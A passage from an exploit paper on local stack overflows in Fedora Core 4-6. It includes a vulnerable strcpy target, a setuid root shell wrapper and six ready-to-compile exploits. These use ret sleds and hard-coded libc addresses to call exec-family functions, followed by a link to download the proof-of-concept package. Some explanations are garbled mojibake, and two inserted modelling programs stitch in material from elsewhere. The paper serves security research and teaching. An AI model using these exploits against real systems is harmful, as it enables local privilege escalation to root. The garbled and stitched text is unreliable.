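    int   argc, envc;
};

/* Copy n strings back to back into the area, fill ptrs[] and terminate it. */
static int pack(struct layout *l, size_t *off, const char *const *strs, size_t n, char **ptrs)
{
    size_t i;
    for (i = 0; i < n; i++) {
        size_t len = strlen(strs[i]) + 1;                       /* "\x00" is "" -> one NUL byte */
        if (*off + len > AREA) return 0;
        ptrs[i] = memcpy(l->area + *off, strs[i], len);
        *off += len;
    }
    ptrs[n] = NULL;                                             /* the array terminator */
    return 1;
}

/* Build the layout for execve(filename, argv, envp). Returns 0 if it does not fit. */
int build_layout(struct layout *l, const char *filename,
                 const char *const *argv, int argc, const char *const *envp, int envc)
{
    const char *fn[1] = { filename };
    char *fnptr[2];
    size_t off = 0;
    if (argc > MAXVEC || envc > MAXVEC) return 0;
    memset(l, 0, sizeof *l);
    l->argc = argc;
    l->envc = envc;
    return pack(l, &off, argv, (size_t)argc, l->vec)
        && pack(l, &off, envp, (size_t)envc, l->vec + argc + 1) /* envp == &argv[argc + 1] */
        && pack(l, &off, fn, 1, fnptr);                         /* the filename follows the last env string */
}

char **layout_argv(struct layout *l) { return l->vec; }
char **layout_envp(struct layout *l) { return l->vec + l->argc + 1; }

/* The 32-bit word execve() would read if this string pointer were handed to it
 * as its argv or envp argument, which is what the sled makes happen. */
uint32_t word_at(const char *p)
{
    uint32_t w;
    memcpy(&w, p, sizeof w);
    return w;
}

/* How many envp[] entries after envp[0] read as a zero word, i.e. can stand in
 * for a NULL argv or envp argument. */
int zero_word_entries(struct layout *l)
{
    char **envp = layout_envp(l);
    int i, n = 0;
    for (i = 1; i < l->envc && word_at(envp[i]) == 0; i++) n++;
    return n;
}

int main(void)
{
    static const char *argv[] = { "./vuln", "<ret sled>" };
    static const char *envp[] = { "./sh", "", "", "", "", "" };  /* the paper's five "\x00" entries */
    struct layout l;
    int i;
    if (!build_layout(&l, "./vuln", argv, 2, envp, 6)) return 1;
    for (i = 0; i < l.envc; i++)
        printf("envp[%d] -> %p  word 0x%08x\n", i, (void *)layout_envp(&l)[i],
               word_at(layout_envp(&l)[i]));
    printf("%d entries usable as null arguments\n", zero_word_entries(&l));
    return 0;
}
```

With the five empty entries, envp[1] and envp[2] both read as 0x00000000, while envp[3] already picks up the first byte of the filename that follows the string area; with four empty entries only envp[1] qualifies, and with three none does, which is the arithmetic behind the count in the execve() exploit.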
Should you need more details, drop me a mail.

6) Conclusion

The technique described here applies from Fedora Core 4 up to the current Fedora Core 6. The appendix code attached below has been tested and verified on those systems. The document itself records the tests on Fedora Core 4, but the appendix exploits were tried up to Fedora Core 6, so once adjusted to your own system they should succeed without any particular trouble.

7) Appendix code

The code below was tested on Fedora Core 4; with only the number of ret words and the address of each exec-family function changed, the same structure exploits Fedora Core 5 and 6. On Fedora Core 4 the attack succeeded with 38 ret words, on Fedora Core 6 with 46. (The three hard-coded address bytes assume that libc lands at the same base address on every run; if it does not, take the function address from the target's own libc before use.)

7-1) The vulnerable target program: vuln.c
Compile: gcc -o vuln vuln.c
------------------------------------------------------------------------------------------------------
/* Proof-of-Concept code */
#include <string.h>
int main(int argc,char *argv[])
{
    char buf[8];
    strcpy(buf,argv[1]);
    return 0;
}
------------------------------------------------------------------------------------------------------

7-2) The shell program run by the exploits: sh.c
Compile: gcc -o sh sh.c
------------------------------------------------------------------------------------------------------
#include <unistd.h>
int main()
{
    setuid(0);
    setgid(0);
    execl("/bin/sh","sh","-p",0);
}
------------------------------------------------------------------------------------------------------

7-3) Local exploit using execl(): 0x82-x_execl.c
The attack has succeeded if "/bin/ls -al" runs normally. The command and arguments placed in the environment may be edited directly. It is a comparatively clean exploit in that it specifies the command arguments itself, without help from the sh program of 7-2).
ÄÄÆÄÀÏ: gcc -o 0x82-x_execl 0x82-x_execl.c ------------------------------------------------------------------------------------------------------ /* 0x82-x_execl.c */ int main() { char *environs[]={ "/bin/ls", /* environ0: /bin/ls */ "ls", /* environ1: ls */ "-al", /* environ2: -al */ 0}; /* execl("/bin/ls","ls","-al",0); */ char *arguments[]={ "./vuln", /* argument0 */ /* argument1 */ "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08" /* ret code number: 38 */ "\x5c\x24\x7a", /* execl() */ 0}; execve("./vuln",arguments,environs); } ------------------------------------------------------------------------------------------------------ 7-4) execle() ÇÔ¼ö¸¦ ÀÌ¿ëÇÑ local exploit code: 0x82-x_execle.c ¾Õ¼­ ¼Ò°³ÇÑ 7-2) sh ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ´Â °ø°Ý ÄÚµå·Î½á, ƯÀÌÇÑ Á¡Àº ȯ°æ º¯¼ö Æ÷ÀÎÅͰ¡ ¾Æ´Ñ, argument Æ÷ÀÎÅ͸¦ ÀÌ¿ëÇÏ¿© °ø°ÝÇÑ´Ù´Â Á¡ÀÌ´Ù. ÀÌ·¸°Ô argument Æ÷ÀÎÅÍ·Î °ø°ÝÇÏ´Â ÀÌÀ¯´Â execle() ÇÔ¼öÀÇ µÎ ¹øÂ° ÀÎÀÚ¿Í ¼¼ ¹øÂ° ÀÎÀÚ¿¡ null(0x00000000) °ªÀ» ÀÔ·ÂÇϱâ À§Çؼ­ÀÌ´Ù. À̰ÍÀº execv*() °è¿­ ÇÔ¼öÀÇ null code¸¦ Æ÷ÀÎÅÍÇÏ´Â ÁÖ¼Ò¸¦ ³Ö¾îÁÖ´Â °Í°ú ´Þ¸®, Á÷Á¢ null(0x00000000) °ªÀ» °®´Â Äڵ带 ÀÔ·ÂÇØÁÖ¾î¾ß ÇÑ´Ù. ÀÌ·¸°Ô ¿¬¼ÓµÇ´Â null(0x00000000) °ªÀ» ¸¸µé±â À§ÇØ argument Æ÷ÀÎÅÍ ³¡ ºÎºÐ°ú ȯ°æ º¯¼ö Æ÷ÀÎÅÍ ³¡ ºÎºÐÀÇ null code¸¦ ÀÌ¿ëÇÏ¿´´Ù. 
ÄÄÆÄÀÏ: gcc -o 0x82-x_execle 0x82-x_execle.c ------------------------------------------------------------------------------------------------------ /* 0x82-x_execle.c */ /* execle()´Â execv*() °è¿­°ú ´Ù¸£°Ô Æ÷ÀÎÅͰ¡ ¾Æ´Ñ, NULL Äڵ带 Á÷Á¢ ÀÔ·ÂÇØÁÖ¾î¾ß ÇÑ´Ù. */ int main() { char *environs[]={0}; /* execle() ¼¼ ¹øÂ° ÀÎÀÚ: 0x00000000 */ char *arguments[]={ "./vuln", /* argument0 */ /* argument1 */ "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08" /* ret code number: 37 */ "\x08\x23\x7a", /* execle() */ "./sh", /* execle() ù ¹øÂ° ÀÎÀÚ: ./sh */ 0}; /* execle() µÎ ¹øÂ° ÀÎÀÚ: 0x00000000 */ /* execle("./sh",0x00000000,0x00000000); */ execve("./vuln",arguments,environs); } ------------------------------------------------------------------------------------------------------ 7-5) execlp() ÇÔ¼ö¸¦ ÀÌ¿ëÇÑ local exploit code: 0x82-x_execlp.c "/bin/ls -al" ¸í·ÉÀÌ Á¤»óÀûÀ¸·Î ½ÇÇàµÇ¸é, °ø°ÝÀº ¼º°øÇÑ °ÍÀÌ´Ù. ȯ°æ º¯¼ö·Î µé¾î°¡´Â ¸í·É, ÀÎÀÚ´Â Á÷Á¢ ¼öÁ¤ÇØÁ൵ µÈ´Ù. ¾Õ¼­ ¼Ò°³ÇÑ 7-2) sh ÇÁ·Î±×·¥ µµ¿ò¾øÀÌ ¸í·É ÀÎÀÚ±îÁö ÁöÁ¤ÇÏ¿© ½ÇÇà °¡´ÉÇÑ ºñ±³Àû ±ò²ûÇÑ(?) exploit code ÀÌ´Ù. exploit method´Â execl() ÇÔ¼ö »ç¿ë ½Ã¿Í µ¿ÀÏÇÏ´Ù. 
ÄÄÆÄÀÏ: gcc -o 0x82-x_execlp 0x82-x_execlp.c ------------------------------------------------------------------------------------------------------ /* 0x82-x_execlp.c */ int main() { char *environs[]={ "/bin/ls", /* environ0: /bin/ls */ "ls", /* environ1: ls */ "-al", /* environ2: -al */ 0}; char *arguments[]={ "./vuln", /* argument0 */ /* argument1 */ "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08" /* ret code number: 38 */ "\x78\x29\x7a", /* execlp() */ 0}; execve("./vuln",arguments,environs); } ------------------------------------------------------------------------------------------------------ 7-6) execv() ÇÔ¼ö¸¦ ÀÌ¿ëÇÑ local exploit code: 0x82-x_execv.c ¾Õ¼­ ¼Ò°³ÇÑ 7-2) sh ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ´Â °ø°Ý ÄÚµå·Î½á, execv() µÎ ¹øÂ° ÀÎÀÚ¿¡ null code Æ÷ÀÎÅͰ¡ ¾Æ´Ñ, null(0x00000000) code¸¦ Á÷Á¢ ³Ö¾î °ø°ÝÀ» ½ÃµµÇÑ´Ù. ÇÔ¼öÀÇ ÀÎÀÚ´Â ´Ü µÎ °³¸¸ ÇÊ¿ä·ÎÇϹǷÎ, ½±°Ô °ø°Ý¿¡ ¼º°øÇÒ ¼ö ÀÖ´Ù. 
Compile: gcc -o 0x82-x_execv 0x82-x_execv.c
------------------------------------------------------------------------------------------------------
/* 0x82-x_execv.c */
#include <unistd.h>

int main(void)
{
    char *environs[] = {
        "./sh",                        /* environ0: ./sh */
        0 };

    /*
    ** execv()'s arguments:
    ** --
    ** execv("./sh", 0x00000000);
    */
    char *arguments[] = {
        "./vuln",                      /* argument0 */
        /* argument1 */
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08" /* ret code number: 38 */
        "\xd4\x22\x7a",                /* execv() */
        0 };

    execve("./vuln", arguments, environs);
    return 0;
}
------------------------------------------------------------------------------------------------------

7-7) Local exploit code using the execvp() function: 0x82-x_execvp.c

This attack code uses the sh program introduced in 7-2). It puts a bare null (0x00000000), not a pointer to null bytes, into execvp()'s second argument. Since the function needs only two arguments, the attack succeeds easily. The exploit method is the same as when using the execv() function.
Compile: gcc -o 0x82-x_execvp 0x82-x_execvp.c
------------------------------------------------------------------------------------------------------
/* 0x82-x_execvp.c */
#include <unistd.h>

int main(void)
{
    char *environs[] = {
        "./sh",                        /* environ0: ./sh */
        0 };

    /*
    ** execvp()'s arguments:
    ** --
    ** execvp("./sh", 0x00000000);
    */
    char *arguments[] = {
        "./vuln",                      /* argument0 */
        /* argument1 */
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08"
        "\x96\x82\x04\x08\x96\x82\x04\x08" /* ret code number: 38 */
        "\xa0\x25\x7a",                /* execvp() */
        0 };

    execve("./vuln", arguments, environs);
    return 0;
}
------------------------------------------------------------------------------------------------------

7-8) Local exploit code using the execve() function: 0x82-x_execve.c

This is the attack code introduced in the earlier example: execve()'s second and third arguments are given null code pointers, that is, pointers to a run of zero bytes in the environment string area, so that when execve() dereferences them it reads 0x00000000. Of course, the attack also succeeds when a bare null (0x00000000) is put there instead of a null code pointer.
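A null code pointer is not itself 0x00000000; it points at environ1 or environ2, and the kernel reads four bytes there to get argv[0] or envp[0]. So those four bytes must all be zero, which is why the code below carries five "\x00" entries rather than two. The model here is an added example, not the paper's code. It assumes the string area is laid out the way execve() copies it: each argv and envp string back to back with its terminating NUL, and whatever string the kernel places next (represented by a constructed filler, "./vuln") starting immediately after the last one. The function names are mine.

```c
/* Added example, not the paper's code: model of the execve() string area.
 * Assumption: strings are copied back to back, each followed by its NUL, and
 * the next thing the kernel stores (a constructed filler here) follows at once. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define AREA_MAX   64
#define MAX_EMPTY  8

/* Copy the strings contiguously and record where each one starts
 * (those offsets are what the envp[] pointers would hold). */
static size_t lay_out_strings(const char *const *strs, size_t n,
                              const char *filler, unsigned char *area,
                              size_t *starts)
{
    size_t off = 0;
    for (size_t i = 0; i < n; i++) {
        size_t len = strlen(strs[i]) + 1;     /* kernel copies strlen+1 bytes */
        memcpy(area + off, strs[i], len);
        starts[i] = off;
        off += len;
    }
    memcpy(area + off, filler, strlen(filler) + 1);   /* next string, no gap */
    return off + strlen(filler) + 1;
}

/* The 32-bit value a callee gets when it treats envp[i] as char ** and
 * dereferences it once, e.g. execve() fetching argv[0] from its 2nd parameter. */
static uint32_t word_through(const unsigned char *area, size_t start)
{
    uint32_t w;
    memcpy(&w, area + start, sizeof w);       /* x86 tolerates the unaligned read */
    return w;
}

/* envp = { "./sh", "" x n_empty }: do envp[1] and envp[2] both read as a
 * 4-byte zero, i.e. work as the "null code pointers" of 7-8)? */
int null_code_pointers_ok(size_t n_empty)
{
    const char *strs[1 + MAX_EMPTY];
    size_t starts[1 + MAX_EMPTY];
    unsigned char area[AREA_MAX];

    if (n_empty < 2 || n_empty > MAX_EMPTY)   /* envp[1] and envp[2] must exist */
        return 0;
    strs[0] = "./sh";
    for (size_t i = 0; i < n_empty; i++)
        strs[1 + i] = "";                     /* what "\x00" becomes once copied */
    size_t total = lay_out_strings(strs, 1 + n_empty, "./vuln", area, starts);
    if (total + sizeof(uint32_t) > AREA_MAX)
        return 0;
    return word_through(area, starts[1]) == 0 && word_through(area, starts[2]) == 0;
}

/* Smallest number of "" entries after "./sh" that makes both pointers work. */
int min_empty_strings_needed(void)
{
    for (size_t n = 0; n <= MAX_EMPTY; n++)
        if (null_code_pointers_ok(n))
            return (int)n;
    return -1;
}

int main(void)
{
    for (size_t n = 2; n <= 6; n++)
        printf("%zu empty strings: envp[1]/envp[2] as null pointers %s\n",
               n, null_code_pointers_ok(n) ? "ok" : "NOT ok");
    printf("minimum needed: %d\n", min_empty_strings_needed());
    return 0;
}
```

With fewer than five entries, the fourth byte read through environ2 is the first byte of the string that follows, so execve() would see a garbage argv[0] or envp[0] pointer instead of an empty array; the count is dictated by the layout, not chosen for padding.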
Compile: gcc -o 0x82-x_execve 0x82-x_execve.c
------------------------------------------------------------------------------------------------------
/* 0x82-x_execve.c */
#include <unistd.h>

int main(void)
{
    char *environs[] = {
        "./sh",                        /* environ0: ./sh */
        "\x00",                        /* environ1: 0x00000000 */
        "\x00",                        /* environ2: 0x00000000 */
        "\x00",                        /* environ3 */
        "\x00",                        /* environ4 */
        "\x00",                        /* environ5 */
        0 };

    /*
    ** execve()'s arguments:
    ** --
    ** execve("./sh", [null code pointer], [null code pointer]);
    */
    char *arguments[] = {
        "./vuln",                      /* argument0 */
        /* argument1 */
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08"
        "\xb6\x83\x04\x08\xb6\x83\x04\x08" /* ret code number: 38 */
        "\xac\x21\x7a",                /* execve() */
        0 };

    execve("./vuln", arguments, environs);
    return 0;
}
------------------------------------------------------------------------------------------------------

If you want the complete code, download and try the following Proof-of-Concept package:

http://x82.inetcop.org/h0me/papers/data/0x82-local_environ_bof.tgz

(If you unpack it as root, the binaries come out root-owned with the setuid bit set.)

Then, happy exploiting... :-}

8) References

- Fedora Core 3 based remote buffer overflow method (author: 유동훈, Xpl017Elz)
- Local stack-based overflow exploit method on Fedora Core 4, 5, 6 (author: 유동훈, Xpl017Elz)
- Local stack-based overflow exploit on White Box Enterprise 4 and CentOS 4.2 systems (author: 유동훈, Xpl017Elz)